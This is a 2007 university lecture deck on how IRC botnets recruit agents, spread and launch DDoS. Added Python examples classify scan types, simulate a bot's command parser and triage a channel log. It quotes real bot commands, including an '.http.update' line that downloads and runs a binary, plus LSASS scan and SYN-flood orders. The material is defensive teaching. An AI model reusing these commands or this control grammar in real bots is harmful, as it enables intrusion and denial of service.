563.7.2 Bot Nets

  1. 563.7.2 Bot Nets. Evgeni Peryshkin, University of Illinois, Fall 2007

  2. What botnets do
  • Denial of service (Tribe Flood Network, Trinoo, Stacheldraht, Trinity)
  • Adware
  • Spyware
  • E-mail spam
  • Click fraud: generating a charge per click without any actual interest in the target of the ad's link
  • Identity theft
  • Spreading new malware: a starting base for e-mail viruses
  Source: papers/bots

  3. Creation and use (diagram; source: wikipedia: botnet)

  4. Dramatis personae (two diagrams)
  • Agent-handler attack model: attacker(s) → handlers → agents → victim
  • IRC-based attack model: attacker(s) → IRC server → agents → victim
  Source: Specht, Lee, 04

  5. Agent recruitment - scanning strategy
  • Random Scanning (Code Red)
    • high volume of inter-network traffic may aid detection
    • no coordination increases the likelihood of duplicate scans
  • Hit List
    • splits off pieces of the list to give to newly recruited machines
    • can be very fast and efficient, no collisions
    • a large list causes more traffic, possibly aiding detection
  • Permutation Scanning
    • if an agent sees an already infected host, it chooses a new random starting point
    • if an agent sees a threshold number of infected hosts, it becomes dormant
  • Signpost Scanning
    • uses communication patterns or data found on newly infected hosts to select the next targets
    • example: any e-mail worm that spreads using the address book of the infected host
    • hard to detect from traffic patterns
    • may be slow to spread
  • Local Subnet scanning (Code Red II, Nimda)
  Source: UIUC 563.9.1 DoS attacks, Classification/Taxonomy

  6. Agent recruitment - vulnerability scanning
  • Horizontal: looks for a specific port/vulnerability across many hosts
  • Vertical: looks for multiple ports/vulnerabilities on the same host
  • Coordinated: several machines scan the same subnet for a specific vulnerability
  • Stealthy: any of the above, but done slowly to avoid detection
  Source: UIUC 563.9.1 DoS attacks, Classification/Taxonomy
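The four scan types above are easiest to tell apart when you ask, per source, how many hosts and how many ports it touched and how far apart the probes were. The following detector, an added example that is not from the slides, runs that classification over a constructed set of flow records; the records, the thresholds and the /24 grouping used to spot coordinated scanning are all assumptions a real deployment would replace with NetFlow or firewall logs and site-specific tuning.

```python
"""Classify scan traffic into the horizontal / vertical / coordinated / stealthy
taxonomy of slide 6.  Added example, not code from the slides.  Flow records and
all thresholds are constructed assumptions; a real deployment would feed NetFlow
or firewall logs and tune the thresholds to the network.
"""
from collections import defaultdict
from ipaddress import ip_network

# Constructed flow records: (timestamp in seconds, src, dst, dst_port)
FLOWS = (
    # horizontal: one source sweeps 30 hosts on 445 within 30 seconds
    [(t, "10.0.0.5", f"192.168.1.{i}", 445) for t, i in enumerate(range(10, 40))]
    # vertical: one source probes 25 ports on a single host
    + [(100 + p, "10.0.0.9", "192.168.1.50", p) for p in range(20, 45)]
    # coordinated: six sources in one /24 each probe five different hosts on 135,
    # so no single source crosses the horizontal threshold on its own
    + [(200 + i, f"10.0.1.{s}", f"192.168.2.{5 * (s - 2) + i}", 135)
       for s in range(2, 8) for i in range(1, 6)]
    # stealthy: one source probes 445 on 30 hosts, one probe per hour
    + [(3600 * i, "10.0.0.77", f"192.168.3.{i}", 445) for i in range(1, 31)]
    # benign: one client talking to one server on 443
    + [(400 + i, "10.0.0.3", "192.168.1.1", 443) for i in range(50)]
)

HORIZONTAL_MIN_HOSTS = 20   # distinct targets on one port from one source (assumed)
VERTICAL_MIN_PORTS = 20     # distinct ports on one target from one source (assumed)
COORD_MIN_SOURCES = 3       # sources in the same /24 hitting the same port (assumed)
STEALTHY_MIN_GAP = 600      # seconds between probes that counts as "slow" (assumed)


def classify_scans(flows):
    """Return (kind, actor, target_or_port, count) findings for the flows."""
    findings = []
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        by_src[src].append((ts, dst, port))

    for src, recs in by_src.items():
        dsts_by_port = defaultdict(set)
        ports_by_dst = defaultdict(set)
        for _, dst, port in recs:
            dsts_by_port[port].add(dst)
            ports_by_dst[dst].add(port)
        # horizontal: many hosts, one port; stealthy if the probes are spread out in time
        for port, dsts in dsts_by_port.items():
            if len(dsts) >= HORIZONTAL_MIN_HOSTS:
                times = sorted(ts for ts, _, p in recs if p == port)
                gaps = [b - a for a, b in zip(times, times[1:])]
                slow = bool(gaps) and min(gaps) >= STEALTHY_MIN_GAP
                findings.append(("stealthy horizontal" if slow else "horizontal",
                                 src, port, len(dsts)))
        # vertical: many ports, one host
        for dst, ports in ports_by_dst.items():
            if len(ports) >= VERTICAL_MIN_PORTS:
                findings.append(("vertical", src, dst, len(ports)))

    # coordinated: several sources from one /24 sharing a port whose combined
    # target set is as large as a horizontal scan would be
    by_subnet_port = defaultdict(lambda: (set(), set()))
    for _, src, dst, port in flows:
        subnet = str(ip_network(f"{src}/24", strict=False))
        srcs, dsts = by_subnet_port[(subnet, port)]
        srcs.add(src)
        dsts.add(dst)
    for (subnet, port), (srcs, dsts) in by_subnet_port.items():
        if len(srcs) >= COORD_MIN_SOURCES and len(dsts) >= HORIZONTAL_MIN_HOSTS:
            findings.append(("coordinated", subnet, port, len(dsts)))
    return findings


if __name__ == "__main__":
    for finding in classify_scans(FLOWS):
        print(finding)
```

The stealthy case is the one that per-minute rate alerts miss: the source touches as many hosts as the noisy scanner, just one per hour, so the detector keys on the distinct-target count over the whole window and only uses timing to label the finding. The coordinated case is the mirror image: each source stays under the per-source threshold, and only the union over the source subnet gives it away.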

  7. Agent recruitment - attack code propagation
  • Central Server (li0n worm)
    • all newly recruited agents contact a central server to get the attack code
    • single point of failure: can be discovered and shut down
    • high load at the central server may limit efficiency or enable detection
  • Back-chaining (Ramen, Morris worms)
    • attack code is downloaded from the machine that was used to exploit the new host
  • Autonomous (Code Red, Warhol, various e-mail worms)
    • attack code is delivered concurrently with the exploit
  Source: UIUC 563.9.1 DoS attacks, Classification/Taxonomy

  8. How to study botnets
  • Create a honeynet: an interactive honeypot
  • Data Control: contain malicious activity leaving your node
  • Data Capture: store what the intruder is doing
  • Data Analysis: interpret the captured data
  • Data Collection: send the captured data to a central organization
  Source: papers/honeynet

  9. How IRC-controlled botnets grow
  • Compromise the host
  • Use tftp/ftp/http/csend to transfer the bot binary to the compromised host
  • Start the binary, which connects to a hard-coded master server (addressed by a dynamic DNS name)
  • The bot contacts the server and sends information about itself, including the features it understands
  • The bot logs in to the master's channel with a password
  Source: papers/bots

  10. How IRC-controlled botnets grow 2
  • The topic of the channel is interpreted as a command by the bot.
  • Example: advscan lsass 200 5 0 -r -s
    • use 200 threads to search for the LSASS vulnerability, with a delay of 5 seconds; -s for silent, to reduce traffic. This adds more hosts to the botnet.
  • Example 2: .http.update http://<server>/~mugenxu/rBot.exe c:\msy32awds.exe 1
    • download the binary file and execute it to update the bot.
  • Generally bots don't spread unless told to.
  Source: papers/bots

  11. How IRC-controlled botnets grow 3
  • If requested, the bot tells the server about its spreading (new infections).
  • The IRC server provides the channel's user list only to channel operators, to save traffic and to disguise the number of bots.
  • Before commands can be sent, the controller has to authenticate to the bots over the IRC channel.
  • Example: .la plmp -s
    • -s: no failure reply, to reduce traffic
  Source: papers/bots

  12. How IRC-controlled botnets grow 4
  • The IRC server(s) are themselves compromised machines.
  • Running your own IRC server gives flexibility and is harder to trace back to the attacker.
  • Beginners run the bot network on an unmodified IRCd: 1,200 clients named rbot<######> reporting scanning results are easy to discover.
  • Top botnet IRC servers: Unreal IRCd and ConferenceRoom.
  Source: papers/bots
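Slides 9 to 12 describe one control loop: the bot joins the channel, ignores everything until the controller authenticates, then treats the channel topic or messages as commands, and stays quiet when -s is given. The interpreter below, an added example rather than code from the slides or from the Honeynet paper they cite, models exactly that grammar for the commands quoted on the slides (.la, advscan, scanstop, .http.update, .ddos.syn) and records what a bot would do, without scanning, downloading or flooding anything. Everything the slides leave unsaid is an assumption and is marked as such in the code: the meaning of the third advscan number, the trailing 1 of .http.update, and the reply strings.

```python
"""Bot-side interpreter for the IRC channel commands quoted on slides 9 to 12.

Added example; not code from the slides or from the Honeynet paper (papers/bots).
It models the command grammar only (login, advscan, scanstop, http.update, ddos.syn)
and records the action a bot would take; it performs no scanning, downloading or
flooding.  Assumptions: commands may carry a leading '.', '-s' suppresses the bot's
reply, the three numeric advscan fields are threads / delay in seconds / run time in
minutes with 0 meaning unlimited (the slide names only the first two), the trailing
'1' of http.update means "run after download", and the reply texts are made up.
"""
from dataclasses import dataclass, field


@dataclass
class BotState:
    password: str                  # secret the controller must present with .la / .login
    authenticated: bool = False    # slide 11: no commands are accepted before login
    actions: list = field(default_factory=list)   # recorded actions, in order


def _split(tokens):
    """Separate positional arguments from '-x' flags."""
    args = [t for t in tokens if not t.startswith("-")]
    flags = {t for t in tokens if t.startswith("-")}
    return args, flags


def handle_command(bot, line):
    """Interpret one controller line (channel topic or message).

    Returns the bot's reply text, or None when the command is silent (-s),
    arrives before the controller has logged in, or is unknown.
    """
    tokens = line.strip().split()
    if not tokens:
        return None
    cmd = tokens[0].lstrip(".").lower()
    args, flags = _split(tokens[1:])
    silent = "-s" in flags

    if cmd in ("la", "login"):
        bot.authenticated = bool(args) and args[0] == bot.password
        if not bot.authenticated:
            return None if silent else "[Auth]: login failed"   # -s: no fail reply (slide 11)
        return None if silent else "[Auth]: password accepted"

    if not bot.authenticated:
        return None   # ignore everything until the controller has authenticated

    if cmd == "advscan" and len(args) >= 4:
        vuln = args[0]
        threads, delay, minutes = (int(x) for x in args[1:4])   # assumed field meanings
        bot.actions.append(("scan", vuln, threads, delay, minutes, "-r" in flags))
        return None if silent else f"[Scan]: {vuln} with {threads} threads, delay {delay}s"
    if cmd == "scanstop":
        bot.actions.append(("scanstop",))
        return None if silent else "[Scan]: stopped"
    if cmd == "http.update" and len(args) >= 2:
        url, path = args[0], args[1]
        run = len(args) > 2 and args[2] == "1"   # assumed: trailing 1 = execute after download
        bot.actions.append(("update", url, path, run))
        return None if silent else f"[Update]: {url} -> {path}"
    if cmd == "ddos.syn" and len(args) >= 3:
        target, port, secs = args[0], int(args[1]), int(args[2])
        bot.actions.append(("ddos.syn", target, port, secs))
        return None if silent else f"[DDoS]: Flooding: ({target}:{port}) for {secs} seconds"
    return None


if __name__ == "__main__":
    bot = BotState(password="plmp")
    for topic in ("advscan lsass 200 5 0 -r -s",      # ignored: controller not logged in yet
                  ".la plmp -s",                        # silent login
                  "advscan lsass 200 5 0 -r -s",        # now accepted, still silent
                  ".ddos.syn 151.49.8.XXX 21 200"):     # verbose: bot reports back
        print(repr(topic), "->", handle_command(bot, topic))
    print(bot.actions)
```

Two details matter for anyone writing detection against this traffic: the login password travels in clear text over the channel, which is what makes the "botnet stealing" of slides 15 and 18 possible, and a -s on every command means a well-run botnet produces almost no bot-to-server chatter, so the channel topic and the initial login are the lines worth watching.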

  13. Different kinds of bots (popular ones)
  • Agobot/Phatbot/Forbot/XtremBot: tidy GPL C++, abstract design, modular and easy to add commands to
  • SDBot/RBot/UrBot/UrXBot/...: most active, messy C, GPL
  • mIRC-based bots (GT-Bots): launch the mIRC chat client and use a HideWindow executable to hide it
  Source: papers/bots

  14. Botnet size
  • Dutch police found a 1.5 million node botnet
  • Norwegian ISP Telenor disbanded a 10,000-node botnet
  • "Of the 600 million computers currently on the internet, between 100 and 150 million were already part of these botnets," Mr Cerf said
  • Generally 50k is large for a botnet
  Sources: bbc, papers/bots

  15. Botnet vs botnet
  • If a machine is part of 2 botnets, packet sniffing allows gathering the key information (server, channel, password) of the other botnet.
  • Thus it is possible to "steal" another botnet. Stealing is easier than building one.
  • Some actually "secure" the bot machines against rivals: install patches, shut down open ports.
  • DDoS is also used to take over (kidnap) bots.
  Sources: honeynet; dark reading (one on one)

  16. New botnets
  • Shift from IRC to HTTP and peer-to-peer
  • Peer-to-peer is becoming more popular: not centralized, bots forward commands to other bots.
  Source: dark reading

  17. Example DDoS attack
  [###FOO###] <~nickname> .scanstop
  [###FOO###] <~nickname> .ddos.syn 151.49.8.XXX 21 200
  [###FOO###] <-[XP]-18330> [DDoS]: Flooding: (151.49.8.XXX:21) for 200 seconds
  [...]
  [###FOO###] <-[2K]-33820> [DDoS]: Done with flood (2573KB/sec).
  [###FOO###] <-[XP]-86840> [DDoS]: Done with flood (351KB/sec).
  Source: papers/bots
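A channel log like the one above is what an analyst gets back from a honeynet's data capture, and the questions are always the same: who gave orders, what was the target, how many bots answered, and how much bandwidth did they claim. The script below, an added example and not code from the slides, parses the excerpt (kept with the slide's redacted target, the "[...]" line dropped) and answers those questions. It assumes that the operator-prefixed nick (~) is the controller and that the -[XP]- / -[2K]- nick prefix is an OS tag, as the naming on the slide suggests.

```python
"""Analyst-side triage of the IRC log excerpt on slide 17.

Added example, not code from the slides.  It parses the bot channel lines, separates
controller commands (dot-commands, here from the operator-prefixed '~' nick) from bot
status reports, and sums the flood rates the bots report.  Assumption: the '-[XP]-' /
'-[2K]-' nick prefix is an OS tag chosen by the bot, as the naming scheme on the slide
suggests.  The log text is the slide's excerpt with its redacted target kept as-is.
"""
import re
from collections import Counter

# Constructed from the slide's excerpt (the "[...]" elision line is dropped)
LOG = """\
[###FOO###] <~nickname> .scanstop
[###FOO###] <~nickname> .ddos.syn 151.49.8.XXX 21 200
[###FOO###] <-[XP]-18330> [DDoS]: Flooding: (151.49.8.XXX:21) for 200 seconds
[###FOO###] <-[2K]-33820> [DDoS]: Done with flood (2573KB/sec).
[###FOO###] <-[XP]-86840> [DDoS]: Done with flood (351KB/sec).
"""

LINE_RE = re.compile(r"^\[(?P<chan>[^\]]+)\]\s+<(?P<nick>[^>]+)>\s+(?P<msg>.*)$")
DDOS_CMD_RE = re.compile(r"^\.ddos\.(?P<kind>\w+)\s+(?P<target>\S+)\s+(?P<port>\d+)\s+(?P<secs>\d+)")
FLOODING_RE = re.compile(r"\[DDoS\]: Flooding: \((?P<target>[^:]+):(?P<port>\d+)\)")
DONE_RE = re.compile(r"\[DDoS\]: Done with flood \((?P<rate>\d+)KB/sec\)")
OS_TAG_RE = re.compile(r"^-\[(?P<os>\w+)\]-")   # assumed meaning of the nick prefix


def triage(log_text):
    """Summarise who commanded what and which bots reported back."""
    summary = {
        "controllers": set(),
        "commands": [],          # (kind, target, port, seconds) for ddos commands
        "other_commands": [],    # other dot-commands seen from controllers
        "bots": set(),
        "total_kb_per_sec": 0,   # sum of the rates the bots claim in "Done with flood"
        "os_mix": Counter(),
    }
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue                                   # e.g. the "[...]" elision line
        nick, msg = m["nick"], m["msg"]
        if msg.startswith("."):                        # command from a controller
            summary["controllers"].add(nick.lstrip("~@+"))   # strip IRC mode prefixes
            c = DDOS_CMD_RE.match(msg)
            if c:
                summary["commands"].append((c["kind"], c["target"], int(c["port"]), int(c["secs"])))
            else:
                summary["other_commands"].append(msg)
            continue
        if FLOODING_RE.search(msg) or DONE_RE.search(msg):   # status report from a bot
            summary["bots"].add(nick)
            d = DONE_RE.search(msg)
            if d:
                summary["total_kb_per_sec"] += int(d["rate"])
    for bot in summary["bots"]:                        # count each bot once
        t = OS_TAG_RE.match(bot)
        summary["os_mix"][t["os"] if t else "unknown"] += 1
    return summary


if __name__ == "__main__":
    for key, value in triage(LOG).items():
        print(f"{key}: {value}")
```

Even three reporting bots give the victim's operator something actionable: the target address and port, the flood duration the controller asked for, and an order of magnitude for the traffic. On a full capture the bot set is also the list of infected hosts to notify.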

  18. Lessons learned
  • Botnets are stolen frequently: with the password and channel name, one can instruct the bots to upgrade to a rival's bot software (fun to watch bots steal bots).
  • Updates are frequent; one update killed a botnet because of a single invalid character in the nickname.
  • Unskilled people run botnets (reusing their own username, their own servers, their own web server for updates).
  • Botnets are often run by young males with surprisingly limited programming skills ("How can I compile *").
  Source: papers/bots

  19. Suggested readings
  • http://honeynet.thalix.com/papers/honeynet/index.html
  • http://www.honeynet.org/papers/bots/
  • http://en.wikipedia.org/wiki/Bot_net
  • http://news.bbc.co.uk/2/hi/business/6298641.stm
  • http://www.wired.com/politics/security/magazine/15-09/ff_estonia
